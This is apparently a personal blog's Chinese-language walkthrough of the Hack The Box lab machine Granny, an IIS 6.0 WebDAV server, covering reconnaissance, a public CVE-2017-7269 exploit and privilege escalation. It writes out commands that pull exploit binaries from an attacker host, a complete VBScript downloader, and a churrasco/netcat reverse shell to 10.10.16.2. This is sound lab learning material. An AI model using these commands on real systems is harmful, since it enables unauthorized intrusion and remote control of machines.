[HTB] Granny Walkthrough - Flydragon's Blog

前言#

~~看到朋友在寫所以 the 學~~
剛接觸 Windows 滲透，不想重複踩坑，所以來寫靶機的 Write-up，做個紀錄這樣 XD
這台是 Hack The Box 的 Granny，難度是 Easy

使用到的技巧：

VBScript 傳輸檔案
churrasco.exe 提權

Attacker: 10.10.16.2
Target: 10.10.10.15

Recon#

nmap

1
sudo nmap -sV -sC 10.10.10.15

1
PORT   STATE SERVICE VERSION
2
80/tcp open  http    Microsoft IIS httpd 6.0
3
|_http-server-header: Microsoft-IIS/6.0
4
| http-methods:
5
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
6
| http-webdav-scan:
7
|   Server Date: Mon, 08 Apr 2024 02:27:18 GMT
8
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
9
|   WebDAV type: Unknown
10
|   Server Type: Microsoft-IIS/6.0
11
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
12
|_http-title: Under Construction
13
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
14

15
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
16
Nmap done: 1 IP address (1 host up) scanned in 35.73 seconds

看起來是 WebDav Server，且用 PUT method 可以上傳檔案

看看 Web 的部分

用 burp 看 response header 可以知道是 ASP.NET 框架

dirsearch

1
dirsearch -u http://10.10.10.15/ -r

有些資訊洩漏，但沒什麼想法

1
[22:45:28] 200 -  246B  - /_private/     (Added to queue)
2
[22:45:28] 301 -  153B  - /_private  ->  http://10.10.10.15/%5Fprivate/
3
[22:45:28] 200 -  759B  - /_vti_bin/     (Added to queue)
4
[22:45:28] 301 -  155B  - /_vti_bin  ->  http://10.10.10.15/%5Fvti%5Fbin/
5
[22:45:28] 200 -    2KB - /_vti_inf.html
6
[22:45:28] 301 -  155B  - /_vti_log  ->  http://10.10.10.15/%5Fvti%5Flog/
7
[22:45:28] 200 -  246B  - /_vti_log/     (Added to queue)
8
[22:45:28] 500 -   88B  - /_vti_cnf/
9
[22:45:29] 200 -  195B  - /_vti_bin/_vti_aut/author.dll
10
[22:45:29] 200 -   96B  - /_vti_bin/shtml.exe?_vti_rpc
11
[22:45:29] 500 -   88B  - /_vti_pvt/
12
[22:45:29] 200 -  195B  - /_vti_bin/_vti_adm/admin.dll
13
[22:45:29] 200 -  106B  - /_vti_bin/shtml.exe/qwertyuiop
14
[22:45:29] 200 -  105B  - /_vti_bin/shtml.dll/asdfghjkl
15
[22:45:29] 200 -   96B  - /_vti_bin/shtml.dll
16
[22:45:40] 200 -  369B  - /aspnet_client/     (Added to queue)
17
[22:45:40] 301 -  158B  - /aspnet_client  ->  http://10.10.10.15/aspnet%5Fclient/
18
[22:45:52] 301 -  149B  - /images  ->  http://10.10.10.15/images/     (Added to queue)
19
[22:45:52] 200 -  242B  - /images/
20
[22:46:08] 200 -    2KB - /postinfo.html

Exploit#

Google

找到一個 RCE 的 exploit
https://github.com/eliuha/webdav_exploit

沒拿到 shell 換個 exploit
https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell

拿到 shell ㄌ，但還拿不到 user flag

Privilege Escalation#

systeminfo + Windows-exploit-suggester

1
python2 windows-exploit-suggester.py --database 2024-04-01-mssb.xls --systeminfo sysinfo.txt

拿到蠻多路線的，可以一個一個嘗試

不過沒辦法用 powershell 傳輸檔案

1
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.2:8000/ms15-051_x32.exe', 'ms15-051_x32.exe')"

改用 Certutil.exe 也不行

1
certutil.exe -urlcache -split -f http://10.10.16.2:8000/ms15-051_x32.exe

不過之前 RECON 知道可以用 PUT 上傳檔案
用 davtest 確認一下可以上傳的 extension

1
davtest -url http://10.10.10.15

1
 Sending test files
2
PUT     shtml   FAIL
3
PUT     cgi     FAIL
4
PUT     cfm     FAIL
5
PUT     pl      FAIL
6
PUT     php     FAIL
7
PUT     aspx    FAIL
8
PUT     asp     FAIL
9
PUT     jsp     FAIL
10
PUT     txt     FAIL
11
PUT     html    FAIL
12
PUT     jhtml   FAIL

哭阿，居然沒得用

只好用 VBScript

1
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
2
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
3
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
4
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
5
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
6
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
7
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
8
echo Err.Clear >> wget.vbs
9
echo Set http = Nothing >> wget.vbs
10
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
11
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
12
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
13
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
14
echo http.Open "GET", strURL, False >> wget.vbs
15
echo http.Send >> wget.vbs
16
echo varByteArray = http.ResponseBody >> wget.vbs
17
echo Set http = Nothing >> wget.vbs
18
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
19
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
20
echo strData = "" >> wget.vbs
21
echo strBuffer = "" >> wget.vbs
22
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
23
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
24
echo Next >> wget.vbs
25
echo ts.Close >> wget.vbs

1
cscript /nologo wget.vbs http://10.10.16.2:8000/ms15-051_x32.exe ms15-051_x32.exe

1
.\ms15-015_x32.exe

卡住了，ctrl+c 重發 exploit，然後就拿不到 shell ㄌ

一個一個試太浪費時間，等待 Reset 的垃圾時間再去 Google 一下
找到 churrasco.exe

https://github.com/Re4son/Churrasco/

用 VBScript 上傳 churrasco.exe 跟 nc_x32.exe
再用 churrasco.exe 彈 reverse shell

1
churrasco.exe -d "nc_x32.exe -e cmd.exe 10.10.16.2 1234"

提權成功！

後記#

RCE 部分很明確，後來看其他人的 Write-up 發現還有蠻多種方法
提權部分就有點坐牢了，老機器減少樂趣QQ
學到用 VBScript 傳輸檔案跟新的提權方式還是蠻賺的，可惜沒怎麼玩到 WebDav